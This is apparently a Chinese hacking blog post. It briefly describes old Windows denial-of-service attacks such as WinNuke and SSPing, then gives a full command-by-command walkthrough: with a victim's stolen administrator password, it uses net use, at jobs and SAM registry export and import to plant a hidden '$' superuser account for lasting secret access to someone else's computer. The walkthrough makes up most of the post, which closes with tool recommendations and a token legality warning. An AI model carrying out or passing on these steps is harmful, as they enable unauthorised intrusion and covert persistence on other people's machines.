作者:hacker发布时间:2022-08-26分类:破解邮箱浏览:60评论:3
1.OOB攻击
这是利用NETBIOS中一个OOB (Out of Band)的漏洞而来进行的,它的原理是通过TCP/IP协议传递一个数据包到计算机某个开放的端口上(一般是137、138和139),当计算机收到这个数据包之后就会瞬间死机或者蓝屏现象,不重新启动计算机就无法继续使用TCP/IP协议来访问网络。
2.DoS攻击
这是针对Windows 9X所使用的ICMP协议进行的DOS(Denial of Service,拒绝服务)攻击,一般来说,这种攻击是利用对方计算机上所安装协议的漏洞来连续发送大量的数据包,造成对方计算机的死机。
3.WinNuke攻击
目前的WinNuke系列工具已经从最初的简单选择IP攻击某个端口发展到可以攻击一个IP区间范围的计算机,并且可以进行连续攻击,还能够验证攻击的效果,还可以对检测和选择端口,所以使用它可以造成某一个IP地址区间的计算机全部蓝屏死机。
4.SSPing
这是一个IP攻击工具,它的工作原理是向对方的计算机连续发出大型的ICMP数据包,被攻击的机器此时会试图将这些文件包合并处理,从而造成系统死机。
我可以告诉你一个办法不过需要对象的用户名和口令,还要知道他的IP
地址,只要你知道拿到账号和密码半个小时就可以搞定,以后你就有一个自己的隐藏管理员账户,随便进入他的电脑。
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1.这里先假设他的用户名为administrator,密码为12345678,现在我们开始在命令行下远程为它建立隐藏的超级用户。(假设主机是局域网内的一台主机,ip地址为13.50.97.238,。)
2.先与他建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"Administrator”
3.用at命令在他的电脑建立一个用户(如果at服务没有启动,可用netsvc.exe或sc.exe来远程启动):
at
\\13.50.97.238
12:51
c:\windows\system32\net.exe
user
hacker$
1234
/add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net
user将不显示这个用户,但在帐户管理器却能看到这个用户。
4.同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:
at
\\13.50.97.238
12:55
c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users
/e
是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe
/e
hacker.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users"引起来。
5.将他的电脑上的hacker.reg下载到本机上用记事本打开进行编辑命令为:
Copy
\\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
6.再将编辑好的hacker.reg拷回他的电脑上
copy
c:\hacker.reg
\\13.50.97.238\admin$\system32\hacker1.reg
7.查看他的电脑时间:net
time
\\13.50.97.238然后用at命令将用户hacker$删除:
at
\\13.50.97.238
13:40
net
user
hacker$
/del
8.验证hacker$是否删除:net
use
\\13.50.97.238
/del
断开与他的电脑连接。
再用net
use
\\13.50.97.238\ipc$
"1234"
/user:"hacker$"
用帐户hacker$与他电脑连接,不能连接说明已删除。
9.再与他电脑建立连接:
net
use
\\13.50.97.238\ipc$
"12345678"
/user:"administrator"
再取得他的时间,用at命令将拷回他的hacker1.reg导入他的注册表:
at
\\13.50.97.238
13:41
c:\windows\regedit.exe
/s
hacker1.reg
regedit.exe的参数/s是指安静模式。
10.再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11.再验证用户hacker$是否有读、写、删除的权限,如果不放心,你还可验证是否能建立其它帐户。
12.通过步骤11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删除的权限。
OK
以后你可以随意拿你的账号进入他电脑里游荡了~~~~~~~~~~~~~~~
自动扫描并自动攻击的软件不是没有,而是这类软件是有局限性的,目前都不好用了,因为它针对的漏洞目前在互联网上都非常少了,所以没有利用的价值了。 针对于IP的漏洞扫描程序也就是漏洞扫描器,这个我倒是可以推荐给你,如果你英文好的话,我建议你使用国外目前最强的扫描器 --- Nessus,它支持漏洞扫描插件,也就是说你自己写NASL攻击测试脚本可以对这款扫描器的功能进行增强,它扫描的准确性很高,速度非常快,在国际上是非常著名的。Nessus官网下载地址: 如果你的英文不是很好的话,我可以推荐你国人开发的漏洞扫描程序,首推是国内著名网络安全组织--安全焦点的X-Scan扫描器,它扫描准确性很高,同样支持插件,不过功能没有Nessus那么强大,安全焦点官网下载地址是: 目前最新版本是X-Scan V3.3 除此之外还有其他的漏洞扫描器,例如:小榕大哥写的那个流光也不错,还有国人汉化的那个H-Scan也很好。
至于基于IP地址的漏洞攻击程序互联网上有很多,我推荐给你一个万能的攻击攻击包,它是外国人写的,非常强大,名字叫:Metasploit Framework 3.3.3 官网下载地址:
我最后提醒你一下,未授权非法入侵他人计算机是一种违法行为!请你谨慎使用这种技术!
已有3位网友发表了看法:
访客 评论于 2022-08-26 18:11:10 回复
count\users/e是regedit.exe的参数,在这里HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users这个键的一定不要以“\“结尾。必要的情况下可以用引号将"c:\windows\regedit.exe/ehacker.re
访客 评论于 2022-08-26 15:32:06 回复
.reg\\13.50.97.238\admin$\system32\hacker1.reg7.查看他的电脑时间:nettime\\13.50.97.238然后用at命令将用户hacker$删除:at\\13.50.97.23813:40netuserhacker$/del8.验证hack
访客 评论于 2022-08-26 09:01:30 回复
你一个万能的攻击攻击包,它是外国人写的,非常强大,名字叫:Metasploit Framework 3.3.3 官网下载地址: 我最后提醒你一下,未授权非法入侵他人计算机是一种违法行为!请你谨慎使用这种技术!